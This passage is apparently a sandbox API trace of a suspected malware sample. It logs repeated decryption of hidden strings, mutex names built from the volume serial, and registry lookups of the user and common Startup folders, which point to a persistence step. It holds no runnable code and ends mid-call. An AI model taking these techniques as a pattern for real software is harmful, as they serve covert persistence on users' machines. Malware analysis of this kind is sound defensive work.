phProv=0x115fcf0*=0x12f68a8) returned 1 [0129.218] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fd0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fd74 | out: phKey=0xd6fd74*=0x13096f0) returned 1 [0129.228] CryptSetKeyParam (hKey=0x13096f0, dwParam=0x1, pbData=0xd6fd5c, dwFlags=0x0) returned 1 [0129.228] CryptDecrypt (in: hKey=0x13096f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb11d8, pdwDataLen=0xd6fd28 | out: pbData=0x2cb11d8, pdwDataLen=0xd6fd28) returned 1 [0129.228] CryptDestroyKey (hKey=0x13096f0) returned 1 [0129.228] GetTickCount () returned 0xdf82 [0129.228] GetLastError () returned 0x0 [0129.228] GetLocaleInfoW (in: Locale=0x800, LCType=0x58, lpLCData=0xd6fd98, cchData=32 | out: lpLCData="\x03") returned 16 [0129.229] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1c) returned 0x2cb11f0 [0129.229] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1c) returned 0x2cb1218 [0129.229] GetVersion () returned 0x23f00206 [0129.229] GetCurrentProcess () returned 0xffffffff [0129.229] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xd6fd80 | out: TokenHandle=0xd6fd80*=0x1f0) returned 1 [0129.229] GetTokenInformation (in: TokenHandle=0x1f0, TokenInformationClass=0x14, TokenInformation=0xd6fd78, TokenInformationLength=0x4, ReturnLength=0xd6fd7c | out: TokenInformation=0xd6fd78, ReturnLength=0xd6fd7c) returned 1 [0129.229] CloseHandle (hObject=0x1f0) returned 1 [0129.229] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20) returned 0x2cb1240 [0129.229] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fc74, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fcdc | out: phKey=0xd6fcdc*=0x13096f0) returned 1 [0129.229] CryptSetKeyParam (hKey=0x13096f0, dwParam=0x1, pbData=0xd6fcc4, dwFlags=0x0) returned 1 [0129.229] CryptDecrypt (in: hKey=0x13096f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb1240, pdwDataLen=0xd6fc90 | out: pbData=0x2cb1240, pdwDataLen=0xd6fc90) returned 1 [0129.229] CryptDestroyKey (hKey=0x13096f0) returned 1 [0129.229] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1e) returned 0x2cb1268 [0129.229] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1e) returned 0x2cb1290 [0129.229] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb12b8 [0129.229] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fc4c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fcb4 | out: phKey=0xd6fcb4*=0x13096f0) returned 1 [0129.229] CryptSetKeyParam (hKey=0x13096f0, dwParam=0x1, pbData=0xd6fc9c, dwFlags=0x0) returned 1 [0129.229] CryptDecrypt (in: hKey=0x13096f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb12b8, pdwDataLen=0xd6fc68 | out: pbData=0x2cb12b8, pdwDataLen=0xd6fc68) returned 1 [0129.229] CryptDestroyKey (hKey=0x13096f0) returned 1 [0129.230] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb12b8 | out: hHeap=0x2cb0000) returned 1 [0129.230] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2cb1268, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0129.230] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1290 | out: hHeap=0x2cb0000) returned 1 [0129.230] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1240 | out: hHeap=0x2cb0000) returned 1 [0129.230] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xd6fd1c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xd6fd1c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0129.230] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1268 | out: hHeap=0x2cb0000) returned 1 [0129.230] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x40) returned 0x2cb1240 [0129.230] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fca8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fd10 | out: phKey=0xd6fd10*=0x1309230) returned 1 [0129.230] CryptSetKeyParam (hKey=0x1309230, dwParam=0x1, pbData=0xd6fcf8, dwFlags=0x0) returned 1 [0129.230] CryptDecrypt (in: hKey=0x1309230, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb1240, pdwDataLen=0xd6fcc4 | out: pbData=0x2cb1240, pdwDataLen=0xd6fcc4) returned 1 [0129.230] CryptDestroyKey (hKey=0x1309230) returned 1 [0129.230] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x34) returned 0x2cb1288 [0129.230] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x0 [0129.230] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\0115B419773001") returned 0x1f0 [0129.230] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x0) returned 0x0 [0129.230] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1240 | out: hHeap=0x2cb0000) returned 1 [0129.230] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1288 | out: hHeap=0x2cb0000) returned 1 [0129.230] ReleaseMutex (hMutex=0x1f0) returned 1 [0129.230] CloseHandle (hObject=0x1f0) returned 1 [0129.230] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20) returned 0x2cb1240 [0129.230] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fc88, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fcf0 | out: phKey=0xd6fcf0*=0x13096f0) returned 1 [0129.231] CryptSetKeyParam (hKey=0x13096f0, dwParam=0x1, pbData=0xd6fcd8, dwFlags=0x0) returned 1 [0129.231] CryptDecrypt (in: hKey=0x13096f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb1240, pdwDataLen=0xd6fca4 | out: pbData=0x2cb1240, pdwDataLen=0xd6fca4) returned 1 [0129.231] CryptDestroyKey (hKey=0x13096f0) returned 1 [0129.231] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1e) returned 0x2cb1268 [0129.231] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1e) returned 0x2cb1290 [0129.231] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb12b8 [0129.231] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fc60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fcc8 | out: phKey=0xd6fcc8*=0x1309170) returned 1 [0129.231] CryptSetKeyParam (hKey=0x1309170, dwParam=0x1, pbData=0xd6fcb0, dwFlags=0x0) returned 1 [0129.231] CryptDecrypt (in: hKey=0x1309170, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb12b8, pdwDataLen=0xd6fc7c | out: pbData=0x2cb12b8, pdwDataLen=0xd6fc7c) returned 1 [0129.231] CryptDestroyKey (hKey=0x1309170) returned 1 [0129.231] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb12b8 | out: hHeap=0x2cb0000) returned 1 [0129.231] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2cb1268, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0129.231] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1290 | out: hHeap=0x2cb0000) returned 1 [0129.231] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1240 | out: hHeap=0x2cb0000) returned 1 [0129.231] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xd6fd30, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xd6fd30*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0129.231] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1268 | out: hHeap=0x2cb0000) returned 1 [0129.231] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x40) returned 0x2cb1240 [0129.231] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fcbc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fd24 | out: phKey=0xd6fd24*=0x13096f0) returned 1 [0129.231] CryptSetKeyParam (hKey=0x13096f0, dwParam=0x1, pbData=0xd6fd0c, dwFlags=0x0) returned 1 [0129.231] CryptDecrypt (in: hKey=0x13096f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb1240, pdwDataLen=0xd6fcd8 | out: pbData=0x2cb1240, pdwDataLen=0xd6fcd8) returned 1 [0129.231] CryptDestroyKey (hKey=0x13096f0) returned 1 [0129.231] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x34) returned 0x2cb1288 [0129.231] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x0 [0129.231] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\0115B419773000") returned 0x1f0 [0129.231] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x0) returned 0x0 [0129.231] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1240 | out: hHeap=0x2cb0000) returned 1 [0129.231] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1288 | out: hHeap=0x2cb0000) returned 1 [0129.231] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1152019, lpParameter=0xd6fdf8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x218 [0129.232] Sleep (dwMilliseconds=0x1388) [0134.266] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20) returned 0x2cb1240 [0134.266] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fc74, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fcdc | out: phKey=0xd6fcdc*=0x13273d8) returned 1 [0134.266] CryptSetKeyParam (hKey=0x13273d8, dwParam=0x1, pbData=0xd6fcc4, dwFlags=0x0) returned 1 [0134.266] CryptDecrypt (in: hKey=0x13273d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb1240, pdwDataLen=0xd6fc90 | out: pbData=0x2cb1240, pdwDataLen=0xd6fc90) returned 1 [0134.267] CryptDestroyKey (hKey=0x13273d8) returned 1 [0134.267] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1e) returned 0x2cb1268 [0134.267] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1e) returned 0x2cb1290 [0134.267] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb12b8 [0134.267] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fc4c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fcb4 | out: phKey=0xd6fcb4*=0x1326f58) returned 1 [0134.267] CryptSetKeyParam (hKey=0x1326f58, dwParam=0x1, pbData=0xd6fc9c, dwFlags=0x0) returned 1 [0134.267] CryptDecrypt (in: hKey=0x1326f58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb12b8, pdwDataLen=0xd6fc68 | out: pbData=0x2cb12b8, pdwDataLen=0xd6fc68) returned 1 [0134.267] CryptDestroyKey (hKey=0x1326f58) returned 1 [0134.267] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb12b8 | out: hHeap=0x2cb0000) returned 1 [0134.267] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2cb1268, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0134.267] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1290 | out: hHeap=0x2cb0000) returned 1 [0134.267] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1240 | out: hHeap=0x2cb0000) returned 1 [0134.267] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xd6fd1c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xd6fd1c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0134.267] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1268 | out: hHeap=0x2cb0000) returned 1 [0134.267] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x40) returned 0x2cb1240 [0134.267] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fca8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fd10 | out: phKey=0xd6fd10*=0x1327498) returned 1 [0134.267] CryptSetKeyParam (hKey=0x1327498, dwParam=0x1, pbData=0xd6fcf8, dwFlags=0x0) returned 1 [0134.267] CryptDecrypt (in: hKey=0x1327498, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb1240, pdwDataLen=0xd6fcc4 | out: pbData=0x2cb1240, pdwDataLen=0xd6fcc4) returned 1 [0134.267] CryptDestroyKey (hKey=0x1327498) returned 1 [0134.267] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x34) returned 0x2cb1288 [0134.267] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x0 [0134.267] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\0115B419773001") returned 0x250 [0134.267] WaitForSingleObject (hHandle=0x250, dwMilliseconds=0x0) returned 0x0 [0134.267] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1240 | out: hHeap=0x2cb0000) returned 1 [0134.267] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1288 | out: hHeap=0x2cb0000) returned 1 [0134.267] ReleaseMutex (hMutex=0x250) returned 1 [0134.268] CloseHandle (hObject=0x250) returned 1 [0134.268] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x60) returned 0x2cb1240 [0134.268] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fccc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fd34 | out: phKey=0xd6fd34*=0x1327618) returned 1 [0134.268] CryptSetKeyParam (hKey=0x1327618, dwParam=0x1, pbData=0xd6fd1c, dwFlags=0x0) returned 1 [0134.268] CryptDecrypt (in: hKey=0x1327618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb1240, pdwDataLen=0xd6fce8 | out: pbData=0x2cb1240, pdwDataLen=0xd6fce8) returned 1 [0134.268] CryptDestroyKey (hKey=0x1327618) returned 1 [0134.268] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20) returned 0x2cb12a8 [0134.268] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fca4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fd0c | out: phKey=0xd6fd0c*=0x1327418) returned 1 [0134.268] CryptSetKeyParam (hKey=0x1327418, dwParam=0x1, pbData=0xd6fcf4, dwFlags=0x0) returned 1 [0134.268] CryptDecrypt (in: hKey=0x1327418, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb12a8, pdwDataLen=0xd6fcc0 | out: pbData=0x2cb12a8, pdwDataLen=0xd6fcc0) returned 1 [0134.268] CryptDestroyKey (hKey=0x1327418) returned 1 [0134.268] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1e) returned 0x2cb12d0 [0134.268] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1e) returned 0x2cb12f8 [0134.268] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb1320 [0134.268] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fc7c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fce4 | out: phKey=0xd6fce4*=0x1327598) returned 1 [0134.268] CryptSetKeyParam (hKey=0x1327598, dwParam=0x1, pbData=0xd6fccc, dwFlags=0x0) returned 1 [0134.268] CryptDecrypt (in: hKey=0x1327598, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb1320, pdwDataLen=0xd6fc98 | out: pbData=0x2cb1320, pdwDataLen=0xd6fc98) returned 1 [0134.268] CryptDestroyKey (hKey=0x1327598) returned 1 [0134.268] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1320 | out: hHeap=0x2cb0000) returned 1 [0134.268] ExpandEnvironmentStringsW (in: lpSrc="%localappdata%", lpDst=0x2cb12d0, nSize=0xf | out: lpDst="") returned 0x1e [0134.268] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb12f8 | out: hHeap=0x2cb0000) returned 1 [0134.268] RtlReAllocateHeap (Heap=0x2cb0000, Flags=0x0, Ptr=0x2cb12d0, Size=0x3a) returned 0x2cb12d0 [0134.268] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x3a) returned 0x2cb1318 [0134.268] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb1360 [0134.268] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fc78, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fce0 | out: phKey=0xd6fce0*=0x1327598) returned 1 [0134.268] CryptSetKeyParam (hKey=0x1327598, dwParam=0x1, pbData=0xd6fcc8, dwFlags=0x0) returned 1 [0134.268] CryptDecrypt (in: hKey=0x1327598, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb1360, pdwDataLen=0xd6fc94 | out: pbData=0x2cb1360, pdwDataLen=0xd6fc94) returned 1 [0134.268] CryptDestroyKey (hKey=0x1327598) returned 1 [0134.268] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1360 | out: hHeap=0x2cb0000) returned 1 [0134.268] ExpandEnvironmentStringsW (in: lpSrc="%localappdata%", lpDst=0x2cb12d0, nSize=0x1d | out: lpDst="") returned 0x1e [0134.268] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1318 | out: hHeap=0x2cb0000) returned 1 [0134.268] RtlReAllocateHeap (Heap=0x2cb0000, Flags=0x0, Ptr=0x2cb12d0, Size=0x72) returned 0x2cb12d0 [0134.268] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x72) returned 0x2cb1350 [0134.268] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb13d0 [0134.268] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fc78, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fce0 | out: phKey=0xd6fce0*=0x1327058) returned 1 [0134.269] CryptSetKeyParam (hKey=0x1327058, dwParam=0x1, pbData=0xd6fcc8, dwFlags=0x0) returned 1 [0134.269] CryptDecrypt (in: hKey=0x1327058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb13d0, pdwDataLen=0xd6fc94 | out: pbData=0x2cb13d0, pdwDataLen=0xd6fc94) returned 1 [0134.269] CryptDestroyKey (hKey=0x1327058) returned 1 [0134.269] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13d0 | out: hHeap=0x2cb0000) returned 1 [0134.269] ExpandEnvironmentStringsW (in: lpSrc="%localappdata%", lpDst=0x2cb12d0, nSize=0x39 | out: lpDst="C:\\Users\\FD1HVy\\AppData\\Local") returned 0x1e [0134.269] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1350 | out: hHeap=0x2cb0000) returned 1 [0134.269] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb12a8 | out: hHeap=0x2cb0000) returned 1 [0134.269] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x40) returned 0x2cb1350 [0134.269] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fca0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fd08 | out: phKey=0xd6fd08*=0x1327018) returned 1 [0134.269] CryptSetKeyParam (hKey=0x1327018, dwParam=0x1, pbData=0xd6fcf0, dwFlags=0x0) returned 1 [0134.269] CryptDecrypt (in: hKey=0x1327018, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb1350, pdwDataLen=0xd6fcbc | out: pbData=0x2cb1350, pdwDataLen=0xd6fcbc) returned 1 [0134.269] CryptDestroyKey (hKey=0x1327018) returned 1 [0134.269] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x3e) returned 0x2cb1398 [0134.269] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x3e) returned 0x2cb13e0 [0134.269] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb1428 [0134.269] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fc78, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fce0 | out: phKey=0xd6fce0*=0x13272d8) returned 1 [0134.269] CryptSetKeyParam (hKey=0x13272d8, dwParam=0x1, pbData=0xd6fcc8, dwFlags=0x0) returned 1 [0134.269] CryptDecrypt (in: hKey=0x13272d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb1428, pdwDataLen=0xd6fc94 | out: pbData=0x2cb1428, pdwDataLen=0xd6fc94) returned 1 [0134.269] CryptDestroyKey (hKey=0x13272d8) returned 1 [0134.269] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x10) returned 0x2cb12a8 [0134.269] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0xd6fc5c | out: phkResult=0xd6fc5c*=0x250) returned 0x0 [0134.269] RegQueryValueExW (in: hKey=0x250, lpValueName="Startup", lpReserved=0x0, lpType=0xd6fc58, lpData=0x2cb13e0, lpcbData=0xd6fc60*=0x3e | out: lpType=0xd6fc58*=0x2, lpData=0x2cb13e0*=0x10, lpcbData=0xd6fc60*=0x98) returned 0xea [0134.269] RegCloseKey (hKey=0x250) returned 0x0 [0134.269] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb12a8 | out: hHeap=0x2cb0000) returned 1 [0134.269] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1428 | out: hHeap=0x2cb0000) returned 1 [0134.269] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e0 | out: hHeap=0x2cb0000) returned 1 [0134.269] RtlReAllocateHeap (Heap=0x2cb0000, Flags=0x0, Ptr=0x2cb1398, Size=0x7a) returned 0x2cb1398 [0134.269] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x7a) returned 0x2cb1420 [0134.269] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb14a8 [0134.269] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fc74, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fcdc | out: phKey=0xd6fcdc*=0x1327298) returned 1 [0134.269] CryptSetKeyParam (hKey=0x1327298, dwParam=0x1, pbData=0xd6fcc4, dwFlags=0x0) returned 1 [0134.269] CryptDecrypt (in: hKey=0x1327298, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb14a8, pdwDataLen=0xd6fc90 | out: pbData=0x2cb14a8, pdwDataLen=0xd6fc90) returned 1 [0134.269] CryptDestroyKey (hKey=0x1327298) returned 1 [0134.269] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x10) returned 0x2cb1540 [0134.270] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0xd6fc58 | out: phkResult=0xd6fc58*=0x250) returned 0x0 [0134.270] RegQueryValueExW (in: hKey=0x250, lpValueName="Startup", lpReserved=0x0, lpType=0xd6fc54, lpData=0x2cb1420, lpcbData=0xd6fc5c*=0x7a | out: lpType=0xd6fc54*=0x2, lpData=0x2cb1420*=0x10, lpcbData=0xd6fc5c*=0x98) returned 0xea [0134.270] RegCloseKey (hKey=0x250) returned 0x0 [0134.270] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1540 | out: hHeap=0x2cb0000) returned 1 [0134.270] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb14a8 | out: hHeap=0x2cb0000) returned 1 [0134.270] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1420 | out: hHeap=0x2cb0000) returned 1 [0134.270] RtlReAllocateHeap (Heap=0x2cb0000, Flags=0x0, Ptr=0x2cb1398, Size=0xf2) returned 0x2cb1398 [0134.270] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0xf2) returned 0x2cb4410 [0134.270] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb1498 [0134.270] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fc74, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fcdc | out: phKey=0xd6fcdc*=0x1327398) returned 1 [0134.270] CryptSetKeyParam (hKey=0x1327398, dwParam=0x1, pbData=0xd6fcc4, dwFlags=0x0) returned 1 [0134.270] CryptDecrypt (in: hKey=0x1327398, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb1498, pdwDataLen=0xd6fc90 | out: pbData=0x2cb1498, pdwDataLen=0xd6fc90) returned 1 [0134.270] CryptDestroyKey (hKey=0x1327398) returned 1 [0134.270] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x10) returned 0x2cb12a8 [0134.270] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0xd6fc58 | out: phkResult=0xd6fc58*=0x250) returned 0x0 [0134.270] RegQueryValueExW (in: hKey=0x250, lpValueName="Startup", lpReserved=0x0, lpType=0xd6fc54, lpData=0x2cb4410, lpcbData=0xd6fc5c*=0xf2 | out: lpType=0xd6fc54*=0x2, lpData="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0xd6fc5c*=0x98) returned 0x0 [0134.270] RegCloseKey (hKey=0x250) returned 0x0 [0134.270] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb12a8 | out: hHeap=0x2cb0000) returned 1 [0134.270] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1e) returned 0x2cb12a8 [0134.270] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0xd6fc58 | out: phkResult=0xd6fc58*=0x250) returned 0x0 [0134.270] RegQueryValueExW (in: hKey=0x250, lpValueName="Common Startup", lpReserved=0x0, lpType=0xd6fc54, lpData=0x2cb44a8, lpcbData=0xd6fc5c*=0x5a | out: lpType=0xd6fc54*=0x0, lpData=0x2cb44a8*=0xc0, lpcbData=0xd6fc5c*=0x5a) returned 0x2 [0134.270] RegCloseKey (hKey=0x250) returned 0x0 [0134.270] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0xd6fc6c | out: phkResult=0xd6fc6c*=0x250) 